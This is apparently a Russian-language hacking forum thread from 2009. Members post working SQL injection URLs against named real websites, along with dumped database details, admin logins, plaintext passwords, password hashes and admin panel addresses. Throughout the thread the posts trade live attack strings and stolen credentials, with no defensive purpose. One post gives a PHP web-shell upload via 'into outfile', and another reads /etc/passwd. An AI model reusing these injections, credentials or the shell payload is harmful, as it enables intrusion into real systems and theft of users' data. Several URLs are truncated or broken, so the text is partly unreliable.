http://www.horses.lenexpo.ru/news.phtml?id=-103+union+select+1,2,3,4,5,6,7,8,9--
5-ая ветка.
_______________________________________________
"СТРОИТЕЛЬНАЯ КОМПАНИЯ ГОРОД МАСТЕРОВ"
http://town-of-masters.spb.ru/main.php?enter=cat&tovid=-5+union+select+1,version(),3--
5-ая ветка.
_______________________________________________
"Негосударственное образовательное учреждение дополнительного профессионального образования"
http://www.biosens.ru/index.php?res=folder&rec=-41+union+select+1,version()--
Снова 5-ая ветка.
_____________________________________________
"Парк-отель"
http://www.parkhoteldubna.ru/index.php?id_page=1&id_article=3+and+substring(version(),1,1)=5--
Аналогично.
http://english.dvb.no/news.php?id=99997010+union+select+1,version(),3,da tabase(),5,6,USER(),8,9,10,LAST_INSERT_ID(),12,13, 14,15,16,17,18,19,20,21--
5.0.67-0ubuntu6
Яндекс: тИЦ - 70, Страниц - 1
Google: PR - 6
http://www.teatrdoc.ru/plays.php?id=-3+union+select+1,version(),database()%20,USER(),5--
4.1.22
kinoteatr_mysql@194.85.92.114
kinoteatr_td
Яндекс: тИЦ - 0, Страниц - 185
Google: PR - 5
ЯК: Нет;
http://www.mibf.ru/index.php?id=37+union+select+1,2,3,4,5,6,7,8,9,10--
Ветеринарная помощь
http://vet4pet.ru/stat/fulltext.php?id=-7+union+select+1,concat(user(),0x3a,version(),0x3a ,database()),3,4,5,6,7,8--
user(): zorkov@localhost
version(): 5.0.27
database(): zorkov
тИЦ: 10
PR: 2
версия 5+, присутсвует - information_schema
находим таблицу с юзерами
http://vet4pet.ru/stat/fulltext.php?id=-7+union+select+1,2,3,4,table_name,6,7,8+from+infor mation_schema.tables+limit+48,1
marroz_users
получаем колонки
http://vet4pet.ru/stat/fulltext.php?id=-7+union+select+1,column_name,3,4,5,6,7,8+from+info rmation_schema.columns+where+table_name=0x6d617272 6f7a5f7573657273+limit+1,3
осталось только извлечь логин и пароль =)
http://vet4pet.ru/stat/fulltext.php?id=-7+union+select+1,concat(login,0x3a,password),3,4,5 ,6,7,8+from+users+limit+1,1--
ussr:54621b46c1664db5ba7127d8f22aff00 (456654)
Polska Federacja Biotechnologii
http://www.pfb.p.lodz.pl/main/main.php?id=-7+union+select+1,2,3,4,5,6,7,8,concat(user(),0x3a, version(),0x3a,database()),10,11,12,13,14,15,16,17 ,18--
user(): up_pfb@webpl.p.lodz.pl
version(): 5.0.45-Debian_1ubuntu3.3-log
database(): p_pfb
тИЦ: 10
PR: 4
присутствует таблица pbfuser
колонки login,haslo,osoba,tresc,datadodania,r01,r02
http://www.pfb.p.lodz.pl/main/main.php?id=-7+union+select+1,2,3,4,5,6,7,8,concat(login,0x3a,h aslo,0x3a,osoba,0x3a,tresc,0x3a,datadodania),10,11 ,12,13,14,15,16,17,18+from+pbfuser+limit+1,1/*
pfb:krakow:Polska Federacja Biotechnologii::2004-09-13 11:08:11
bezrukiy
07.01.2009, 16:42
http://www.biolight.ru/news.php?id=-1'
http://www.biolight.ru/news.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5--
5.0.51a-community-log
alien_biolight
alien_biolight@localhost
Админ:
http://www.biolight.ru/news.php?id=-1+union+select+1,concat_ws(0x3a,Login,cust_passwor d),3,4,5/**/from/**/alien_biobitor.ukn_users--
MANAGER:12345
Админка:
http://www.biolight.ru/admin/
zifanchuck
07.01.2009, 17:17
ето не сюда)
тебе сюда http://forum.antichat.ru/thread46016.html
http://gta.com.ua/file_sa_details.phtml?id=59+union+select+1,2,3,4,c oncat(version(),0x3a,database(),0x3a,user()),6,7,v ersion(),database(),USER(),SESSION_USER(),LAST_INS ERT_ID(),13,14,15,16,17,18,19,20--
дальше влом крутить..
5.0.51a-community:gtacom_gta:gtacom_gta@localhost
Яндекс: тИЦ - 0, Страниц - 47000
Google: PR - 3
ЯК: Нет;
www.pogoda.ua/index.php?id=28+union+select+1,2,3,4,5/*
а тут вывода ненашол(
а тут вывода ненашол(
Плохо искал..
http://www.pogoda.ua/index.php?id=-28+union+select+1,version(),3,4,5/*
zifanchuck
07.01.2009, 19:19
http://gta.com.ua/file_sa_details.phtml?id=-59+union+select+1,2,3,concat(username,0x3a,passwor d),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from +admin--
токо там по определенному ир(
логин и пасс adminus:lPO7YBB0
www.pogoda.ua/index.php?id=28+union+select+1,2,3,4,5/*
а тут вывода ненашол(
user(): u_pogodatwo@localhost
version(): 4.1.22
database(): pogodatwo
zifanchuck
07.01.2009, 19:43
http://www.pogoda.ua/index.php?id=-28+union+select+1,concat(login,0x3a,password),3,4, 5+from+users+limit+0,1/*
докрутил до етого test:test
а вот табличку с админами ненашел(((
zifanchuck, ну вот одминка pogoda.ua/admin только вот test:test неподходит!
zifanchuck
07.01.2009, 22:07
админку я тожєе нашол а вот пасс админа невыяснеил(((
http://www.emayhem.com/profiles/profile.php?profile=1'
http://www.emayhem.com/profiles/profile.php?profile=-1+union+select+1,2,concat_ws(0x3a,user(),version() ),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*&wId=4 => marty@localhost:5.0.37-log
http://www.emayhem.com/profiles/profile.php?profile=-1+union+select+1,2,concat_ws(0x3a,email,password), 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+use rs+limit+0,1/*&wId=4 => marty@webmayhem.net:ad452de6a1c6876e66abe0e853b6c0 ad
че за хрень? версия 5 а не выводит из information_schema(( кто поможет?)
..::TROYAN::..
08.01.2009, 01:33
1.http://www.flatlux.kiev.ua/rus/index.php?categoryID=-7+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5,6--
flatlux_ower@saturn:flatlux_main:4.1.22-log
PR:5
Тиц:160
2.
http://www.membrana.kiev.ua/catalogue.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),databas e(),version()),5,6,7,8,9,10,11--
root@localhost:membrana:4.0.23a
PR:0
тИЦ: 10
http://www.membrana.kiev.ua/catalogue.php?id=-1+union+select+1,2,3,concat(user,0x3a,password,0x3 a,file_priv),5,6,7,8,9,10,11+from+mysql.user--
root:4fc7a3a65139e6ae:N
3.
http://stroybat.kiev.ua/index.php?pid=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5,6,7,8,9,10,11--&showpage=1
stroybat_stroy1@localhost:stroybat_stroybat:5.0.51 a-community
PR:3
тИЦ: 30
http://stroybat.kiev.ua/index.php?pid=-1+union+select+1,2,table_name,4,5,6,7,8,9,10,11+fr om+information_schema.tables--&showpage=1
Assembler
08.01.2009, 02:43
http://wow.cybergame.su/index.php?newsid=999999+union+select+1,version(),3 ,4,5,6%20--
Как можно посмотреть что выдало при такой скуле. Просто на экране ни че не видо или я не вижу -(
zifanchuck
08.01.2009, 02:52
а там точно скуль??? я неуверен (я правда новичек)
я думаю там ее нету
zifanchuck
08.01.2009, 03:18
Так я все таки прав?? мне кажеться что там иньектом и не пахнет.
А как там на самом деле.... может и есть там скуля
Как можно посмотреть что выдало при такой скуле. Просто на экране ни че не видо или я не вижу -(
На скока если я знаю инъекция вслепую то некак
Aedes.com - PR 4 ~1к
http://www.aedes.com/brand.php?cat_id=-3+union+select+1,2,unhex(hex(version()))--
Northcoast101.com - PR 4 ~1к
http://www.northcoast101.com/menus/index.php?cat_id=-17+union+select+unhex(hex(version()))/*
4 ветка
http://www.northcoast101.com/menus/index.php?cat_id=-17+union+select+unhex(hex(concat_ws(0x3a,name,pass word,email)))+from+LUM_User/*
/admin
Dsmi.tobw.net - PR 4 ~1к
http://dsmi.tobw.net/index.php?cat_id=1+union+select+1,2,3,4+limit+0,1/*
(
Nlstar.com - PR 3 ~0.7к
http://www.nlstar.com/catalog/index.php?cat_id=00000017|%'+union+select+1,2,vers ion(),4/*
еще какойто..
zifanchuck
08.01.2009, 04:11
http://www.tspu.edu.ru/?ur=-284+union+select+1,version(),3,4,5,6,7,8,9,10,11,1 2,13,14,15--
версия 5.0.70-log
http://www.tspu.edu.ru/?ur=-284+union+select+1,table_name,3,4,5,6,7,8,9,10,11, 12,13,14,15+from+INFORMATION_SCHEMA.TABLES--[QUOTE]
имена таблиц
http://www.tspu.edu.ru/?ur=-284+union+select+1,concat(login,0x3a,password),3,4 ,5,6,7,8,9,10,11,12,13,14,15+from+administrtion--[QUOTE]
логин:пасс админов
http://tspu.edu.ru/admins/ админка
Assembler
там нету уязвимости
Assembler
там нету уязвимости
http://wow.cybergame.su/index.php?newsid=-1+union+select+1,2,3,4,5,6+from+information_schema .tables--
судя по отсутствии ошибки при запросе к information_schema, версия там пятая, но вывода что-то не замечаю...
sharoff
а ты уверен что там есть бага ?
sharoff
а ты уверен что там есть бага ?
http://wow.cybergame.su/index.php?newsid=-1+union+select+1,2,3,4,5--
Выдает: The used SELECT statements have a different number of columns
http://wow.cybergame.su/index.php?newsid=-1+union+select+1,2,3,4,5,6--
Ошибка исчезла.
Итог:
6 стоблоцов, вывода нет.
ЗЫ: В этой теме выкладывать инъект, а вопросы - в соседней.
Assembler
08.01.2009, 05:11
http://wow.cybergame.su/index.php?newsid=-25+union+select+1,2,3,column_name,5,6+from+informa tion_schema.columns+where+table_name='account'--
И опять что то не то.
http://wow.cybergame.su/index.php?newsid=-25+union+select+1,2,3,column_name,5,6+from+informa tion_schema.columns+where+table_name='account'--
И опять что то не то.
http://wow.cybergame.su/index.php?newsid=-25+union+select+1,2,3,column_name,5,6+from+informa tion_schema.columns+where+table_name=0x6163636f756 e74--
Там стоит фильтрация кавычек, пользуемся hex
0x6163636f756e74 представляет собой запись account
Еще раз повторяю, вывода там нету, никакой column_name ты не увидишь.
http://www.winlinanswers.com/book/resources.php?id=8'+union+select+1,concat(user(),0 x3a,version(),0x3a,database()),3,4,5 ,6,7,8,9,10,11/*
user(): jeremym@localhost
version(): 4.1.22
database(): MOSKOWITZ
PR: 6
http://www.admanager.nl/online/page.php?id=-8+union+select+1,concat(user(),0x3a,version(),0x3a ,database()),3,4--
user(): admanager@toscane.eid.nl
version(): 4.1.22
database(): admanager
PR: 5
http://www.fhmbuurmeisje.nl/profile.php?id=-8+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,concat(user(),0x3a,ve rsion(),0x3a,database())--
user(): ttg-db@localhost
version(): 4.1.20-log
database(): ttg-fhm
PR: 3
http://www.pca.org.au/?id=-8+union+select+1,2,concat(user(),0x3a,version(),0x 3a,database()),4,5,6,7,8,9,10,11,12--
user(): mypca1005@ws-shared-9.private.netregistry.net
version(): 5.0.32-Debian_7etch6-log
database(): pca_pca_org_au
PR: 5
нашёл таблицу tblmemberlogin, в ней одно поле "txtPassword"
в таблице всего два хэша:
b334044a3535f437c14f24c1e76ae3fb
5f4dcc3b5aa765d61d8327deb882cf99:password
логина нет (толком не искал)
http://www.corpus.cam.ac.uk/jcr/news_article.php?id=99%20and%201=2%20union%20selec t%20
51,concat(ID,0x3a,CPASS),4,3,2,1%20from%20jcr.regu sers--
passwords are hashed ..
L7PYN77G93CKS
I3TJMOGP/CJ8S
I34P65LJ3OV0Y
ООО "ММ ПРИС"
http://www.mmpris.ru/adetails.php?id=-8+union+select+1,concat(version(),0x3a,user(),0x3a ,database()),3,4,5,6,7,8,9--
user(): 1gb_mmpris@10.0.1.32_1
version(): 4.1.21-community-max-nt-log
database(): 1gb_mmpris.mht
тИЦ: 180
PR: 4
Oceanworld Manly Australia
http://www.oceanworld.com.au/page.asp?id=-8+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
user(): oceanworld@localhost
version(): 5.0.18-nt
database(): oceanworld
тИЦ: 10
PR: 6
http://www.pca.org.au/?id=-8+union+select+1,2,concat(user(),0x3a,version(),0x 3a,database()),4,5,6,7,8,9,10,11,12--
user(): mypca1005@ws-shared-9.private.netregistry.net
version(): 5.0.32-Debian_7etch6-log
database(): pca_pca_org_au
PR: 5
нашёл таблицу tblmemberlogin, в ней одно поле "txtPassword"
в таблице всего два хэша:
b334044a3535f437c14f24c1e76ae3fb
5f4dcc3b5aa765d61d8327deb882cf99:password
логина нет (толком не искал)
Порыл чуть глубже - нашел поинтереснее табличку tbluser
В ней intUserLevel , txtUsername , txtPassword
http://www.pca.org.au/?id=-8+union+select+1,2,concat(intUserLevel,0x3a,txtUse rname,0x3a,txtPassword),4,5,6,7,8,9,10,11,12+from+ tbluser+limit+13,1--
По лимитам вроде 13 юзеров. Пару хэшей расшифровал, но что-то не пускает в админку ... пох :)
У меня вот какой вопрос , а точнее ПРОСЬБА !
Может кто-нить показать на примере (любом, хоть одном из тех, что здесь выкладывают), как через скуль залить шелл ? Не через админку , а именно через скуль (into+outfile конструкция вроде используется или как там?).
Инфу почитал на нескольких форумах, но не до конца все понятно ...
Если не трудно кому-нибудь - покажите плиз на примере, как это сделать. Думаю многим полезно будет ...
Octave_Parango
08.01.2009, 18:45
UgMan, юзеры которые находятся в tbluser, точнее их пассы подходят к админке.
Assembler
08.01.2009, 19:10
http://www.cageprisoners.com/articles.php?id=-27207%20union%20select%201,2,concat(username,0x3a, password),4,5,6%20FROM%20admins%20--
Mr. Admin:QYYoUiD1cbIlTi2jPbgoQ0
Логин : Пассворда
http://www.cageprisoners.com/admin
Но только пасс не подходит.. Мб это хеш я особо в них не шарю может подскажите где расшифровать или хотябы что это за тип хеша.
masternet
08.01.2009, 20:18
Может кто-нить показать на примере (любом, хоть одном из тех, что здесь выкладывают), как через скуль залить шелл ? Не через админку , а именно через скуль (into+outfile конструкция вроде используется или как там?).
хз..по моему это редкость..
надо чтобы был включён файл прив и кавычки не фильтруются и ещё путь к корюн чтобы знать..
в общем примерно так +union+select+'<?php eval($_GET[‘e’]) ?>'+into+outfile+'/путь к корню сайта'--
файл прив проверять так
+union+select+1,file_priv+from+mysql.user--
путь к сайту иногда даётся так +union+select+1,load_file('/')--
иногда может быть в конфиге апача..
забыл в каких местах конфиги хранятся..на форуме есть..
prescott
08.01.2009, 20:20
файл прив проверять так
+union+select+1,file_priv+from+mysql.user--
Причем mysql.user тоже открыта крайне редко =)
prescott
08.01.2009, 20:22
http://empireguru.ru/index.html?id=97&parent_id=-2+union+select+1,2,3,4,5,concat(email,name,converg e_pass_salt,0x27,converge_pass_hash),7,8+from+ibf_ members+m+left+join+ibf_members_converge+mc+ON+(m. email%20=%20mc.converge_email)--
seo@datakit.ru - мыло
SCANER логин
"S"4Y соль
c16aa084c6d6a0b2cf5d69bdc32f4204 кэш
наглядный пример инъекции которая достает пару юзер:пасс из IPB
masternet
08.01.2009, 20:26
Причем mysql.user тоже открыта крайне редко =)
ага..ток у меня она почти всегда открыта.. ;)
Assembler
08.01.2009, 20:39
http://www.franciscansinternational.org/docs/statement.php?id=-464%20union%20select%201,2,3,version(),5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20--
_evgeniy_
08.01.2009, 22:07
http://www.cdma.kh.ua/articles/index.php?view=article&id=-999%20union%20select%201,concat(user(),0x3a,versio n(),0x3a,database()),3
plintys_gsm@localhost:5.0.51a-community-log: plintys_cdma
http://www.cdma.kh.ua/forum/admin/
login: pv
pass: 2005
http://www.p-m.com.ua/news/index.php?view=bulletin&id=-999%20union%20select%201,2,3,concat(user(),0x3a,ve rsion(),0x3a,database()),5
pminua_pm@localhost:5.0.51a-community-log: pminua_pmcomua
http://www.m-m.com.ua/article/index.php?view=article&id=-999%20union%20select%201,2,3,concat(user(),0x3a,ve rsion(),0x3a,database())
mmcomua_tok@localhost:5.0.51a-community-log:mmcomua_mm
http://kdsk.com.ua/gallery.php?imID=-999+union+select+1,2,3,concat(user(),0x3a,version( ),0x3a,database()),5,6
kdskcom_site@localhost:5.0.51a-community-log:kdskcom_site
http://www.tet.kharkov.ua/articles/index.php?view=article&id=-999%20union%20select%201,concat(user(),0x3a,versio n(),0x3a,database()),3
tetkhua_tetkha@localhost:5.0.51a-community-log:tetkhua_tetkha
http://www.tet.kharkov.ua/forum/admin/
login: tet
pass: tet2008
http://www.danica-biola.com.ua/resource.php?id_serv=-999+union+select+1,concat(user(),0x3a,version(),0x 3a,database()),3
danica_db@localhost:5.0.51a-community-log:danica_biolacomua
http://www.legion.kharkov.ua/publication/?view=publication&id=-999+union+select+1,2,3,4,5,concat(user(),0x3a,vers ion(),0x3a,database())
legion_val@localhost:5.0.51a-community-log:legion_leg
http://www.afh.kharkov.ua/catalogue/index.php?id=4+union+select+1,2,3,4,concat(user(), 0x3a,version(),0x3a,database()),6
plintys_afh@localhost:5.0.51a-community-log: plintys_afh
PR 7
http://www.northeastern.edu/gradstudies/stories/index.php?id=-86+union+select+1,table_name,3,4,5,6+from+INFORMAT ION_SCHEMA.TABLES--
Выводятся все таблицы и колонки =)
spherics
09.01.2009, 09:28
http://www.compasspoint.org/boardcafe/details.php?id=414114+union+select+1,2,3,4,concat_ ws(0x3a3a,version(),user(),database()),6,7,8,9,10, 11,12,13,14,15,16,17,18,19--
5.0.22-log
compasspoint@www.44fish.com
compasspoint
http://www.aeo.com.pk/indexnew.php?id=9999914+union+select+1,2,concat_ws (0x3a3a,version(),user(),database()),4,5,6,7--
5.0.51a-community-log
aeodb@72.51.46.233
aeo
http://www.alreves.org/artists.php?lang=br&cod_artist=88888810+union+select+1,2,3,concat_ws(0 x3a3a,version(),user(),database()),5,6--
5.0.67-community-log
alreveso_alreves@localhost
alreveso_alreves
http://www.adhesivetape.net/product_details.php?id=1488888+union+select+1,2,3, concat_ws(0x3a3a,version(),user(),database())--
5.0.67-community-nt-log
taperange@redhat.rcc.kudoswebdesign.com
taperange
http://improvised.emagine.ie/news_det.php?id=1799999+union+select+1,2,3,4,conca t_ws(0x3a3a,version(),user(),database()),6,7,8,9,1 0,11,12--
5.0.45-log
improvi_admin@web11.hosting365.ie
improvi_database
Novel Games - Good Games for Your Whole Family
http://www.novelgames.com/gamelicense/codes.php?id=-8+union+select+concat(version(),0x3a,user(),0x3a,d atabase())--
user(): oceanworld@localhost
version(): 4.1.10-log
database(): novelgames
тИЦ: 80
PR: 5
Группа компаний Icon Communications
http://iconcom.ru/page.php?id=-8+union+select+1,concat(user(),0x3a,database(),0x3 a,version()),3,4,5--
user(): doron@stat.interventio.ru
version(): 4.0.20-log
database(): glance_db
PR: 2
эх давно я тут не постил... :rolleyes:
Российская Ассоциация Политической Науки
PR 6
тИЦ 180
http://www.rapn.ru/index.php?grup=634&doc=-2637%20union%20select%20username,user_email,3,4,5, user_password%20from%20rapn_users--
Assembler
09.01.2009, 15:25
http://www.myworldhardware.com/v4/articles.php?ID=104&Page_ID=-1+union+select+1,2,3,concat(name,0x3a,mgroup,0x3a, password,0x3a,email),5%20from%20ibf_members+limit+ 2,1--
Имя: группа: пасс: мыло
rkcs:4:56defccc63de74d71ae919ab1ecae656:rkcs@mywor ldhardware.com
spherics
09.01.2009, 16:04
LOSINGTODAY.COM - THE INDIE MUSIC MAGAZINE
http://www.losingtoday.com/news.php?id=9991475+union+select+1,2,concat_ws(0x3 a3a,version(),user(),database()),4,5,6,7,8,9,10--&news_alpha=f
4.0.17-standard
admin_root@localhost
admin_losingtoday
http://www.bali-koe.com/details.php?id=8888812+union+select+1,2,3,4,5,6,7, concat_ws(0x3a3a,version(),user(),database()),9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43--
4.1.22-standard
jnarwast_etd@localhost
jnarwast_balikoe
http://www.monarchwatch.org/waystations/registry/detail.php?id=148912345+union+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,concat_ws(0x3a3a,vers ion(),user(),database()),19--
4.1.22-standard
monarchw_ws@localhost
monarchw_waystation
AkyHa_MaTaTa
09.01.2009, 17:31
biogeodb.stri.si.edu PR -5
http://biogeodb.stri.si.edu/herbarium/search/quick/?search_key=antichat-forevo')union+select+1,2,3,unhex(hex(concat_ws(0x2 f,id_users,email,password,status))),5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31+from+test.tbl_users/*
PageRank: 8 тИЦ: 140
http://www.sju.edu/academics/hsb/campbell/research-guides/index-new2.php?subid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,SCHEMA_NAME,17+from+INFORMATION_SCHEMA.SCHEMATA/*
http://www.daiso.ro/lista_magazine.php?judet=-6'+UNION+SELECT+CONCAT_WS(0x3a,version(),database( ),user())/*
Database Version: 5.0.32-Debian_7-log
Database name: daiso
User name: daiso@localhost
админка www.daiso.ro/admin
есть маленькая проблемка, данные из БД не подходят к админке, если посмотреть на сервак по реверс айпи то 99% из сайтов на хостинге имеют один и тот же движок и админка у них у всех одинаковая, то есть по одному и тому же адресу..выскакивает окошко куда надо ввести логин и пасс... если у кого нибудь получтся зайти в админку , большая просьба проинформировать меня. Спасибо
PR 7
http://www.northeastern.edu/gradstudies/stories/index.php?id=-86+union+select+1,table_name,3,4,5,6+from+INFORMAT ION_SCHEMA.TABLES--
Выводятся все таблицы и колонки =)
http://www.northeastern.edu/gradstudies/stories/index.php?id=-86+union+select+1,concat(username,0x3a,password),3 ,4,5,6+from+coop_evaluation.users--
but cant dehash pass
http://www.unnindia.com/english/story.php?Id=-3676+union+select+1,2,version(),4,5,6,7,8,9,10,11, 12,13--
pr2 vers 4.1.22-standart
http://www.kmiz.com/news/story.php?id=-11875+union+select+1,2,3,4,version(),6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8,29,30--
5.0.45
http://www.bzpower.com/story.php?ID=-542+union+select+1,2,3,4,5,6,version(),8,9,10,11,1 2,13,14--
5.0.51a-community
http://www.sflcn.com/story.php?id=-4861+union+select+1,2,userName,4,5,6,7,8+from+user s--
successful:success224
http://www.inhealthnw.com/story.php?id=-90+union+select+1,2,3,4,5,6,7,8,9,version(),11,12, 13,14,15--
4.1.21-standard
..::TROYAN::..
09.01.2009, 23:58
http://autoportal.od.ua/?a=tuning_full&id=-53+union+select+1,2,3,concat_ws(0x3a,user(),databa se(),version()),5--
auto_root@localhost:auto_db:5.0.51a-community
http://autoportal.od.ua/?a=tuning_full&id=-53+union+select+1,2,3,concat_ws(0x3a,login,pass),5 +from+users+limit+0,1--
lapochka:0bea5be224d0b4f0f8da45733655f1ec
http://autoportal.od.ua/admin/
Вход без паса.
zifanchuck
10.01.2009, 00:05
http://autoportal.od.ua/
зашел и меня чуть не стошнило 0_о!
ССкоко там ошыбок!
http://www.bramcoteschool.com/news/story.php?id=-73+union+select+table_name+from+INFORMATION_SCHEMA .TABLES--
http://www.world-challenge.com/news/story.php?ID=-799+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, concat_ws(0x3a,password,username),16,17+from+users--
http://www.nigerianinvestments.com/story.php?id=-44+union+select+1,2,version(),4,5--
4.1.21-log
http://www.eslmonkeys.com/student/storyroom/story.php?id=-17+union+select+1,2,version(),4,5,6,7,8,9,10,11--
5.0.51a-community
AkyHa_MaTaTa
10.01.2009, 01:05
PageRank: 8 тИЦ: 1200
http://www.dartmouth.edu/~djsa/list_songs.php?table=Occasion&songAttribute=Omer'+union+select+1,LOAD_FILE('/etc/passwd'),3/*
удачи ;)
..::TROYAN::..
10.01.2009, 03:21
http://www.aib.in.ua/objav/comment/?id=-1+union+select+1,concat_ws(0x3a,username,user_pass word),3,4+from+phpbb_users--
http://www.aib.in.ua/objav/comment/?id=-1+union+select+1,concat_ws(0x3a,login,password),3, 4+from+users--
http://www.aib.in.ua/objav/comment/?id=-1+union+select+1,table_name,3,4+from+information_s chema.tables--
http://www.aib.in.ua/objav/comment/?id=-1+union+select+1,concat_ws(0x3a,user(),version(),d atabase()),3,4--
ezh@localhost:5.0.51a-log:aib
PR:2
ТиЦ: 10
Кемит Блонски
10.01.2009, 05:08
вообщем вот:
http://www.islandreccenter.org/page....(),4,5,6,7,8/*
version: 4.1.22
user: islandrec3@localhost
database: islandrec3
http://breakdance.ru/index.php?id=-1...5,6,7,8,9,10/*
version: 4.1.22
user: break@localhost
database: breake
http://www.smack-dynamik.com/oartist...,7,8,9,10,11/*
version: 4.1.21-standard
user: smackdyn_smack@localhost
database: smackdyn_smack
http://www.bayworld.co.za/press.php?...on(),3,4,5,6/*
version: 5.0.32-Debian_7etch1-log
user: bayworld@localhost
database: bayworld
http://vryeafrikaan.co.za/lees.php?i...,4,5,6,7,8,9/*
version: 4.0.18-log
user: vry-eqly@localhost
database: vryeafrikaan
Octave_Parango
10.01.2009, 05:53
http://www.act-caritas.org/news.php?uid=-130+union+select+1,2,concat(database(),0x3a,versio n(),0x3a,user()),4,5,6,7,8,9,10,1
1,12,13,14,15,16,17,18,19--
Database Version: 5.0.51a-community
Database name: actweb
User name: act-web@localhost
http://www.cmawebline.org/publication/ontarget_details.php?oid=-88+union+select+1,2,3,4,concat(database(),0x3a,ver sion(),0x3
a,user()),6,7--
Database Version: 5.0.45-log
Database name: icma2006
User name: icma123@cgi0102.int.bizland.net
http://www.barevnakeramika.cz/oblast.php?oid=-39+union+select+1,2,concat(database(),0x3a,version (),0x3a,user()),4,5,6,7,8,9,
10,11,12,13--
http://barevnakeramika.cz/admin.php
Database Version: 5.0.32-Debian_7etch8-log
Database name: barkeram
User name: barkeram@localhost
http://www.ekoneum.com/index.php?oid=6&sid=-2588+union+select+1,2,3,4,5,concat(database(),0x3a ,version(),0x3a,user()),7,8,
9--
Database Version: 5.0.21
Database name: ekoneum
User name: ekoneum@10.10.4.21
http://www.pennumbra.com/debates/debate.php?did=-16+union+select+1,2,3,concat(database(),0x3a,versi on(),0x3a,user()),5,6,
7,8,9,10,11,12,13,14,15,16,17,18,19--
Database Version: 5.0.67-log
Database name: mightylab
User name: mlab@nimitz.dreamhost.com
enjoy
The matrix
10.01.2009, 10:13
http://www.scripps.edu/skaggs/kelly/research.php?a=a&cid=12&lsc=g&lscid=-1+union+select+1,2,concat(user(),0x3a,@@version,0x 3a,database()),4/*
kelly@localhost:5.0.41-community:kelly
spherics
10.01.2009, 12:35
Готовы к подаркам *) В общем еще один крупный проект отработанный мной!
Много много плюсиков мне за такой эксклюзивчик.
Меня точно пасадют -)
WINAMP.COM
тИЦ = 2300
PageRank = 8
http://www.winamp.com/skins/details/999140397+union+select+1,2,3,4,5,6,7,concat_ws(0x3 a3a,version(),user(),database()),9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34--
Version:5.0.41-log
User:winamp_read@198.81.11.133
Database:winamp
http://www.winamp.com/skins/details/999140397+union+select+1,2,3,4,5,6,7,concat_ws(0x3 a3a,user,password),9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from +mysql.user--
root:: *0EC95A715350E380433D4368A865B6AA8CBAA0DD
repl:: *EBD5E66022FB70BC57D340689E8ABA6A9E082B53
scout:: *EEDEE7D88BB8FCC1EA0FE5F883ED32595A91C369
mydbm:: *A9C391720DC3B218CD5EFEDFEDB8C55602EFE2FE
nandinib:: *A9C391720DC3B218CD5EFEDFEDB8C55602EFE2FE
agalper:: *A9C391720DC3B218CD5EFEDFEDB8C55602EFE2FE
awang01:: *A9C391720DC3B218CD5EFEDFEDB8C55602EFE2FE
evan:: *A9C391720DC3B218CD5EFEDFEDB8C55602EFE2FE
faringer:: *A9C391720DC3B218CD5EFEDFEDB8C55602EFE2FE
jaiminks:: *A9C391720DC3B218CD5EFEDFEDB8C55602EFE2FE
jeelanib:: *A9C391720DC3B218CD5EFEDFEDB8C55602EFE2FE
joegibbs:: *A9C391720DC3B218CD5EFEDFEDB8C55602EFE2FE
jsobhani:: *A9C391720DC3B218CD5EFEDFEDB8C55602EFE2FE
kpettit:: *A9C391720DC3B218CD5EFEDFEDB8C55602EFE2FE
ltowle:: *A9C391720DC3B218CD5EFEDFEDB8C55602EFE2FE
mnj6819:: *A9C391720DC3B218CD5EFEDFEDB8C55602EFE2FE
tapan:: *A9C391720DC3B218CD5EFEDFEDB8C55602EFE2FE
toni:: *A9C391720DC3B218CD5EFEDFEDB8C55602EFE2FE
bhaskara:: *A9C391720DC3B218CD5EFEDFEDB8C55602EFE2FE
santoshp:: *A9C391720DC3B218CD5EFEDFEDB8C55602EFE2FE
muruganp:: *A9C391720DC3B218CD5EFEDFEDB8C55602EFE2FE
NowellC1:: *A9C391720DC3B218CD5EFEDFEDB8C55602EFE2FE
michaeld005:: *A9C391720DC3B218CD5EFEDFEDB8C55602EFE2FE
sjdevir:: *A9C391720DC3B218CD5EFEDFEDB8C55602EFE2FE
lshoang:: *A9C391720DC3B218CD5EFEDFEDB8C55602EFE2FE
chriscnguyen:: *A9C391720DC3B218CD5EFEDFEDB8C55602EFE2FE
jpepersack05:: *A9C391720DC3B218CD5EFEDFEDB8C55602EFE2FE
kaliyaperumal11:: *A9C391720DC3B218CD5EFEDFEDB8C55602EFE2FE
vvsaxena:: *A9C391720DC3B218CD5EFEDFEDB8C55602EFE2FE
simondsja:: *A9C391720DC3B218CD5EFEDFEDB8C55602EFE2FE
santoshk02:: *A9C391720DC3B218CD5EFEDFEDB8C55602EFE2FE
bhaskaram01:: *A9C391720DC3B218CD5EFEDFEDB8C55602EFE2FE
shrisri:: *A9C391720DC3B218CD5EFEDFEDB8C55602EFE2FE
muruganperumal:: *A9C391720DC3B218CD5EFEDFEDB8C55602EFE2FE
winamp_read:: *DD055FFF6E1066B0F6EA932465DB32333A3F766A
winamp_write:: *0C8DD50C9A7AD182564C884E95E9656344631780
Жеееесть, примерно число посетителей 3,296,412 visits per day
;)
IMAGES FESTIVAL
http://www.imagesfestival.com/call.php?id=-10+union+select+1,concat(user(),0x3a,version(),0x3 a,database()),3,4,5,6,7,8,9,10,11--
user(): imagesfest@localhost
